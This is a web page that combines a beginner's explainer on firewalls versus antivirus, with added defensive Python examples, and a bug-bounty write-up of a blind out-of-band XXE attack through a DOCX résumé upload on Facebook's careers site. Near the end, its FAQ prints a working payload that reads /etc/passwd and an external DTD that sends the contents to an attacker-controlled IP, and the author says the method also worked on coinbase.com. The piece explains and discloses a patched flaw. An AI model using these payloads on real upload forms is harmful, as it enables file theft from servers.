Using Firewall and Antivirus to Protect Against Hacking

Want to know how to use Firewall and Antivirus to protect against hacking? You have come to the right place!

Firewall and antivirus. When it comes to cybersecurity products, we frequently hear these two terms. If we don’t know what they are and how they work, we begin to merge them in our minds as similar software.

In reality, the two are very different from each other and serve entirely separate purposes. If you visit the official website of any antivirus company, you’ll see that under product features, both firewall and antivirus (sometimes coupled with antispyware or anti-ransomware) are listed separately.

That’s because they provide different kinds of security. So, now that we have established that the two are separate things, let’s talk about what they are and how they work.


What is a Firewall?

Let’s begin simply. A firewall is a sort of virtual wall that stops unwanted visitors. It’s a barrier that stands between your home network and other networks or the World Wide Web.

How Does it Work?

The firewall is responsible for monitoring incoming and outgoing data or requests and blocking the ones that it finds suspicious and that shouldn’t be communicated.

For instance, let’s say you installed an app that turned out to be malicious. Now the app will most likely try to establish a connection with another host on the internet. But if you have a firewall installed, it will prevent the app from going ahead with this activity.

Similarly, if some rogue application on the internet tries to reach an app on your device – for instance, your webcam – the firewall will intervene to prevent that.

So, in essence, your firewall is like a guard at your door. Only this guard also has the dual responsibility of filtering outbound traffic.

Types of Firewall

Firewalls work at different levels to provide specialized monitoring for varied purposes.

Packet Filtering – Packets are incoming and outgoing chunks of data that are monitored and analyzed against a set of predefined filters. If the filters clear these packets, they are let through. If they are found to be suspicious, they are blocked. The packet filtering firewall is also called Network Layer Firewall.

Proxy Server – At this level, the firewall provides security to a local network by filtering the traffic to and from the internet or another larger network. It’s also known as an Application Layer Firewall.

Circuit-Level Gateway – This firewall is similar to the application level firewall, but it works at the session level and offers some added functionality. When the proxy server establishes a connection with the Web server for any webpage access, the server sends back a response. The circuit-level gateway determines whether the requested session is legitimate or not and allows or blocks the access accordingly.


During this communication, the firewall also hides the proxy server’s IP address as it doesn’t let any internal user information through.


What is an Antivirus?

As opposed to a firewall, antivirus software works at the system level protecting it from any malicious files or programs. Also referred to as antimalware, the antivirus is responsible for keeping your system secure from all kinds of malware attacks either by isolating or removing them.

How does an Antivirus Work?

The antivirus software scans all the files and apps on your system against its definitions of known malicious code. If it detects anything that seems out of place or outright malicious, the antivirus instantly blocks its activity and then removes it from the system.

There are essentially three steps that an antivirus follows: Scan > Detect > Remove. Antivirus protection covers malware types such as viruses, worms, Trojan horses, botnets, adware, ransomware, spyware, etc.


Types of Detection

Typically, antivirus software uses three different types of detection techniques.

Specific Detection – As the name suggests, this detection method looks for particular kinds of known malware types based on their defining characteristics.


Generic Detection – This technique scans for malware types that are variants of known malware families or that share a common codebase.

Heuristic Detection – This is the most advanced detection method. Instead of matching known code, it looks for unusual or suspicious behaviors or file structures.

Modern antivirus software uses all three techniques to secure your devices against known as well as emerging malware threats.
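To make the three detection tiers concrete, here is an added example (not code from the original article) that runs specific, generic and heuristic detection in that order over a few files constructed in memory. The "DemoDropper" family pattern, the document extensions and the entropy threshold are made-up illustration values; the only real signature is the EICAR industry test string, which is harmless by design.

```python
# Added example: the three antivirus detection tiers applied to constructed
# in-memory files. Signatures, family pattern and thresholds are illustrative.
import hashlib
import math
import re

# EICAR is the standard, harmless antivirus test file; its hash is our one
# "specific" signature. Computed at runtime so no hash needs to be hardcoded.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
KNOWN_BAD_SHA256 = {hashlib.sha256(EICAR).hexdigest(): "EICAR-Test-File"}

# "Generic" detection: a byte pattern shared by every variant of a (made-up)
# malware family, so a new version is still caught without its own hash.
FAMILY_PATTERNS = {"DemoDropper": re.compile(rb"FAM-DROPPER-v\d+")}

# "Heuristic" detection: structural traits, not code. Two traits are required
# before a file is flagged, so one odd trait (e.g. a legitimately compressed
# archive) does not produce a false positive on its own.
DOCUMENT_EXTS = {"txt", "doc", "docx", "pdf", "rtf"}
ENTROPY_THRESHOLD = 7.2   # bits per byte; assumed threshold for "packed/encrypted"

def shannon_entropy(data):
    """Average bits of information per byte; 8.0 means perfectly random."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def scan(name, data):
    """Return (verdict, detail): specific, then generic, then heuristic checks."""
    digest = hashlib.sha256(data).hexdigest()
    if digest in KNOWN_BAD_SHA256:
        return "malicious", f"specific: {KNOWN_BAD_SHA256[digest]}"
    for family, pattern in FAMILY_PATTERNS.items():
        if pattern.search(data):
            return "malicious", f"generic: variant of {family}"
    reasons = []
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if data.startswith(b"MZ") and ext in DOCUMENT_EXTS:
        reasons.append("executable header inside a document extension")
    if len(data) >= 256 and shannon_entropy(data) > ENTROPY_THRESHOLD:
        reasons.append("high entropy (packed or encrypted content)")
    if len(reasons) >= 2:
        return "suspicious", "heuristic: " + "; ".join(reasons)
    return "clean", "no detection"

# Constructed sample files (name -> content).
HIGH_ENTROPY = bytes(range(256)) * 4          # every byte value equally often
SAMPLES = {
    "notes.txt":      b"quarterly report draft, nothing to see here",
    "eicar.com":      EICAR,
    "invoice_v7.exe": b"MZ" + b"FAM-DROPPER-v7 unpack stub",
    "resume.docx":    b"MZ" + HIGH_ENTROPY,   # executable disguised as a document
    "archive.zip":    HIGH_ENTROPY,           # compressed data: one trait only
}

def scan_all():
    """Scan every sample and return {name: (verdict, detail)}."""
    return {name: scan(name, data) for name, data in SAMPLES.items()}

if __name__ == "__main__":
    for name, (verdict, detail) in scan_all().items():
        print(f"{name:15s} {verdict:10s} {detail}")
```

The order matters: cheap exact matches first, family patterns second, and the heuristic tier last because it is the only one that can misfire, which is why it needs two independent traits before it raises an alert.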


Key Differentiators between a Firewall and Antivirus

So, let’s look at some chief differences between a firewall and an antivirus:

Implementation – Firewalls can be implemented in both software and hardware, whereas antivirus exists only as software.

Protection Capacity – Firewalls only guard against external attacks, whereas antivirus provides security against both internal and external threats.

Security Mechanism – Firewalls can block external threats, but if a rogue element enters the system through another means (such as email links or removable media), the firewall cannot remove the malicious code. Antivirus, on the other hand, periodically scans the system and protects against malicious software on an ongoing basis.

Probability of Security Breach – A firewall can be tricked by IP spoofing (a modified source address) and source routing (specifying a route for packets). However, in the case of antivirus, once malware has been detected, it cannot carry out any counterattack.
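The packet-filtering firewall described in the "Types of Firewall" section, and the IP-spoofing weakness named just above, are easiest to see in a rule table. The following is an added example, not code from the original article: a minimal stateless packet filter with first-match rules and a default-deny fallback, whose first inbound rule is the standard anti-spoofing check (drop Internet-side packets that claim an address from the home LAN). The LAN range, the webcam host address and the sample packets are all constructed for illustration.

```python
# Added example: a stateless packet filter with first-match rules, default
# deny, and an anti-spoofing ingress rule. All addresses are constructed.
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

INTERNAL_NET = ip_network("192.168.1.0/24")   # assumed home LAN

@dataclass(frozen=True)
class Packet:
    direction: str   # "in" (from the Internet) or "out" (to the Internet)
    proto: str       # "tcp" or "udp"
    src: str
    dst: str
    dport: int

@dataclass(frozen=True)
class Rule:
    action: str                  # "allow" or "deny"
    direction: str
    proto: Optional[str] = None  # None matches any protocol
    src: Optional[str] = None    # CIDR; None matches any source
    dst: Optional[str] = None    # CIDR; None matches any destination
    dport: Optional[int] = None  # None matches any destination port
    comment: str = ""

    def matches(self, pkt):
        if self.direction != pkt.direction:
            return False
        if self.proto is not None and self.proto != pkt.proto:
            return False
        if self.src is not None and ip_address(pkt.src) not in ip_network(self.src):
            return False
        if self.dst is not None and ip_address(pkt.dst) not in ip_network(self.dst):
            return False
        if self.dport is not None and self.dport != pkt.dport:
            return False
        return True

RULESET = [
    # Anti-spoofing: a packet from the Internet must not claim a LAN source.
    Rule("deny", "in", src=str(INTERNAL_NET), comment="anti-spoofing"),
    # Nothing from outside may reach the webcam host at all.
    Rule("deny", "in", dst="192.168.1.50/32", comment="webcam host"),
    # Ordinary outbound browsing and DNS from the LAN are allowed.
    Rule("allow", "out", proto="tcp", src=str(INTERNAL_NET), dport=443, comment="https"),
    Rule("allow", "out", proto="tcp", src=str(INTERNAL_NET), dport=80, comment="http"),
    Rule("allow", "out", proto="udp", src=str(INTERNAL_NET), dport=53, comment="dns"),
    # Everything else, in either direction, is dropped.
    Rule("deny", "in", comment="default deny"),
    Rule("deny", "out", comment="default deny"),
]

def filter_packet(pkt, rules=RULESET):
    """Return (action, comment) of the first rule that matches pkt."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action, rule.comment
    return "deny", "no rule matched"   # safety net if a ruleset lacks a default

# Constructed sample traffic.
SAMPLES = {
    "browser_https":  Packet("out", "tcp", "192.168.1.10", "93.184.216.34", 443),
    "rogue_app_home": Packet("out", "tcp", "192.168.1.10", "203.0.113.7", 8443),
    "spoofed_src":    Packet("in",  "tcp", "192.168.1.10", "192.168.1.20", 22),
    "webcam_probe":   Packet("in",  "tcp", "198.51.100.9", "192.168.1.50", 8080),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:15s} -> {filter_packet(pkt)}")
```

The rogue-app case is the article's own scenario: the app is installed and running, so only the outbound default-deny rule stops it from calling home, and the firewall never removes the app itself, which is the antivirus's job.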

So, which one do you need?

Since the two are entirely different and provide different kinds of protection, there’s no question of choosing one over the other. Most advanced cybersecurity products incorporate both, as both are crucial to meeting security requirements.

In a nutshell…

If we employ antivirus protection without a firewall, we open up our private network and the connected devices to a host of external attacks. At the system level, the antivirus will fight them off, but that results in increased use of resources.

That’s why whenever you choose a cybersecurity package (or buy separate security products), make sure it incorporates both firewall and antivirus software to provide a maximum level of protection from cyber threats.

How I Hacked Facebook With A Word Document

The Motivation:

One day I decided to stop hunting bugs in the Facebook Android, iOS and Windows Phone apps and start hunting bugs in the facebook.com website. I said to myself: can I hack Facebook, or any of Facebook’s websites or servers? I said, why not?!

Facebook Tough Security:

Facebook, as you know, is pretty secure because many people have already reported high-severity security bugs since 2010, and they patched a dangerous XML External Entity (XXE) Processing vulnerability affecting OpenID in late 2013.

They said that all of their servers are patched according to this post by their security team: https://www.facebook.com/BugBounty/posts/778897822124446

The Challenge:

I thought it was a DEAD end and I wouldn’t find any XXE vulnerabilities after Facebook patched their servers with the Takedown tool they developed, but I challenged myself to find XXE in Facebook, and after some time digging and hunting I found this URL: https://www.facebook.com/careers/

The Hack:

I tried to upload my CV and it was accepted and uploaded successfully, BUT I could only upload PDF and DOCX files. I already knew that .docx files are zipped XML files developed by Microsoft, according to Wikipedia: http://en.wikipedia.org/wiki/Office_Open_XML

I simply opened MS Word 2010, typed some random text and saved it on my desktop as CV.docx. After that I successfully uploaded it to Facebook and nothing fancy happened, as you’d expect, but I had to find a vulnerability today or I would lose my challenge.

Injecting XML Payload inside CV.docx to read /etc/passwd:

I quickly opened CV.docx with the 7zip program on Windows 7 and extracted all the contents of the CV.docx file. I found some XML files, and then I decided to open this file, [Content_Types].xml, and insert this innocent XML code:

The Evil Twin:

I already had another file, ext.dtd, waiting in the mohaab007 directory, and here is the content of ext.dtd:

The Setup:

Now I had a forged CV.docx file and it was ready to rock. After that I opened port 80 on my home router and started the Python simple HTTP server:

mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80

Password:

Serving HTTP on 0.0.0.0 port 80 …

python-http-server.jpg

The Shock:

I inserted my external IP address, and all I wanted to see was a response in the Python HTTP server saying that something was trying to connect to me. Now everything was good, and then I uploaded CV.docx to https://www.facebook.com/careers/ and waited a minute, but nothing happened.

I said to myself it was a total failure and I would check my Facebook profile instead, chat with some friends and play a game or something after this long FAILED try. I wasted about 15 minutes or so chatting and browsing, but now it was time to stop the Python HTTP server and close Facebook and everything.

I was going to close my terminal window and I was shocked to see that something had connected to my Python HTTP server:

The Impact:

I said WOOOOOOT! I forced a server belonging to Facebook to connect to my Python HTTP server using a sneaky way, and now I can DO:

1- DoS on the parsing system by making it open, e.g. file:///dev/random | file:///dev/urandom | file://c:/con/con

2- TCP scans using HTTP external entities (including behind firewalls since application servers often have world view different from that of the attacker)

3- Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back)

4- DoS on other systems (if the parsing system is allowed to establish TCP connections to other systems)

5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)

6- Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS.

7- Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper.

The Rejection:

I tried to read system files but the application doesn’t have privileges to read files, or there might be a protection in place, or, or, or … BUT I am 100% sure it is Blind XXE Out Of Band (OOB). Plus it was a time-consuming process because I needed to upload and wait for the result after 15 minutes or more.

I didn’t waste too much time and reported it to the Facebook Security team. They rejected my bug report and said:

facebook-reply-xxe-1.jpg

I sent a reply and they said:

Now I was LOST and said to myself HAHAHA, it was a good time but it is over and it is not a vulnerability after all. But I got two connections from Facebook’s server, plus the CV.docx file is corrupted and can’t be opened with MS Office.

The Hope and The Promise:

After exchanging emails with the Facebook security team, I got this reply:

BAAAAAAAAAAAAAM

Now it is time to take a rest and wait for them to fix it...

NOTE:

Now it is fixed and Facebook rewarded me with a nice bounty. After that I found similar vulnerabilities in other websites using the same method.

The funny thing is Facebook said that they patched all of their servers by adding this line: libxml_disable_entity_loader(true). However, I forced a Facebook server to parse my external entities to do things I wanted, and you can watch a video below showing how I did it.

POC Video (Facebook Blind XXE OOB): http://web.archive.org/web/20160315025854if_/http://www.youtube.com/embed/G17cdBicmJg?wmode=opaque&enablejsapi=1
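The lesson for anyone running a CV-upload form is that disabling the entity loader in one code path (the libxml_disable_entity_loader(true) line mentioned above) is not enough if some other component still parses the uploaded XML parts. A DOCX is a zip of XML parts, and no legitimate Office part ever needs a DOCTYPE or entity declaration, so an upload handler can reject any part that declares one before any real parser sees it. The following is an added, defender-side example, not code from the original write-up or from Facebook: it builds two tiny DOCX files in memory (one clean, one carrying a DOCTYPE that points at a placeholder host, attacker.invalid) and uses Python's expat binding to abort on the DOCTYPE itself, before any entity could be declared or resolved.

```python
# Added example: reject DOCX uploads whose XML parts declare a DOCTYPE.
# Both sample documents are constructed in memory; attacker.invalid is a placeholder.
import io
import zipfile
import xml.parsers.expat

XML_PART_SUFFIXES = (".xml", ".rels")   # the OOXML parts that are XML


class DoctypeFound(Exception):
    """Raised from inside the parser the moment a DOCTYPE starts."""


def _abort_on_doctype(doctype_name, system_id, public_id, has_internal_subset):
    # Raising here stops expat before any ENTITY declaration is processed,
    # so nothing in the DTD (internal or external) is ever acted upon.
    raise DoctypeFound(doctype_name)


def check_part(data):
    """Return None if the part is acceptable, else a short rejection reason."""
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _abort_on_doctype
    try:
        parser.Parse(data, True)
    except DoctypeFound:
        return "doctype"
    except xml.parsers.expat.ExpatError:
        # Not a DOCTYPE, but a malformed Office part is not worth processing either.
        return "malformed"
    return None


def scan_docx(docx_bytes):
    """Return {part_name: reason} for every XML part that must not be parsed further."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(XML_PART_SUFFIXES):
                reason = check_part(zf.read(info.filename))
                if reason:
                    findings[info.filename] = reason
    return findings


# Constructed sample parts. The first is a normal [Content_Types].xml; the
# second carries a DOCTYPE referencing an external DTD, which no Office file needs.
CONTENT_TYPES_OK = b"""<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml"
    ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""

CONTENT_TYPES_DTD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Types SYSTEM "http://attacker.invalid/ext.dtd">
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>"""

DOCUMENT_XML = (b'<?xml version="1.0"?>'
                b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                b'<w:body/></w:document>')


def build_docx(content_types):
    """Assemble a minimal two-part DOCX zip around the given [Content_Types].xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", DOCUMENT_XML)
    return buf.getvalue()


if __name__ == "__main__":
    print("clean upload :", scan_docx(build_docx(CONTENT_TYPES_OK)))
    print("dtd upload   :", scan_docx(build_docx(CONTENT_TYPES_DTD)))
```

This pre-check is a gate, not a replacement for a hardened parser: whatever eventually reads the document should still run with external entity and DTD loading disabled, and the gate should apply to every part of the archive, since the write-up's payload went into [Content_Types].xml rather than the document body.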

References:

http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

http://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf (Must Read)

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf

http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf

http://www.nosuchcon.org/talks/2013/D3_03_Alex&Timur_XML_Out_Of_Band.pdf

The Unexpected Reward:

I am listed in Facebook White Hats (2014):

https://www.facebook.com/whitehat/thanks/

The Bottom Line: Facebook was suffering from an unexpected and sneaky XXE vulnerability but they fixed it and rewarded me for helping them.

Compare the risks:

Here is a comparison between Old XXE (OpenID) and My XXE (DOCX):

Facebook’s Official Reply:

facebook XXE reply.jpg

FAQ:

1. How did you put the extracted DOCX data back into a docx?

I opened CV.docx using the 7zip Windows app, inserted the XML code, then closed the 7zip app and saved the changes.

2. What do you mean you put the ext.dtd into your directory?

The purpose of a DTD (Document Type Definition) like ext.dtd is to define the legal building blocks of an XML document. Using an external DTD file to exfiltrate data from other entities, like SYSTEM entities, is a trick from Alexey Osipov and Timur Yunusov.

3. In this part “http://197.37.102.90/FACEBOOK-HACKED?%25file;’>” would I replace that IP with my own?

Yes.

4. Do you think this would work on other job type websites where you can submit a resume, or just specifically Facebook?

Yes, I tried it on other websites like coinbase.com and it worked, and I was able to read system files.

5. In the part where it says: “I inserted my external IP address and all I want to see is a response in python http server saying that something is trying to connect to me”, where did you insert the IP?

I inserted my IP in the ext.dtd file:

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://197.37.102.90/FACEBOOK-HACKED?%25file;'>"
>
%all;

and in the XXE payload:

<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://197.37.102.90/ext.dtd">
%dtd;
%send;
]>

6. What exactly did all that code you input do, specifically?

I highly recommend that you read this post:

http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html